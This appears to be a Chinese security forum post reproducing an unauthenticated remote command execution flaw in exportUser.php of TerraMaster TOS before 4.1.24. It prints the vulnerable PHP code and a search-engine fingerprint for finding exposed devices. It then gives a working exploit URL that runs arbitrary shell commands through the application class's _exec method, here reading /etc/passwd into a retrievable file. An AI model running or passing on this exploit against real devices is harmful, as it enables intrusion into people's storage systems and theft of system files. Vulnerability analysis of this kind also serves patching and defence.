问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
TerraMaster TOS exportUser.php 远程命令执行
# TerraMaster TOS exportUser.php 远程命令执行 ## 漏洞描述 TerraMaster TOS exportUser.php 文件中存在远程命令执行漏洞 ## 漏洞影响 TerraMaster TOS < 4.1.24 ## 网络测...
TerraMaster TOS exportUser.php 远程命令执行 ===================================== 漏洞描述 ---- TerraMaster TOS exportUser.php 文件中存在远程命令执行漏洞 漏洞影响 ---- TerraMaster TOS < 4.1.24 网络测绘 ---- "TerraMaster" && header="TOS" 漏洞复现 ---- 出现漏洞的文件 `*exportUser.php`\* ```php <?php include_once "./app.php"; // [1] autoload classes class CSV_Writer{ ... } $type = $_GET['type']; $csv = new CSV_Writer(); if($type == 1){ $P = new person(); $data = $P->export_user($_GET['data']); $csv->exportUser($data); } else if($type == 2) { $P = new person(); $data = $P->export_userGroup($_GET['data']); $csv->exportUsergroup($data); } else { // [2] type value is bigger than 2 //xlsx通用下载 $type = 0; $class = $_GET['cla']; $fun = $_GET['func']; $opt = $_GET['opt']; $E = new $class(); $data = $E->$fun($opt); // [3] vulnerable code call $csv->exportExcel( $data['title'], $data['data'], $data['name'], $data['save'], $data['down']); } ?> ``` 在其他文件的代码检查期间,也发现有一种方法可以利用TOS软件中预先存在的类来利用此问题。 位于`include/class/application.class.php`中的PHP类是在运行TOS软件的设备上执行命令的最佳人选。 由于*exportUser.php*没有身份验证控件,因此未经身份验证的攻击者有可能通过提供以下值作为HTTP GET参数来实现代码执行。 ```plain http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt ``` 返回200后再次访问 ```plain http://xxx.xxx.xxx.xxx/include/test.txt ``` ![img](https://shs3.b.qianxin.com/butian_public/f7564164669a22aba30490a132b9e04d92d3420ba2ac0.jpg)
发表于 2024-07-12 18:47:36
阅读 ( 955 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!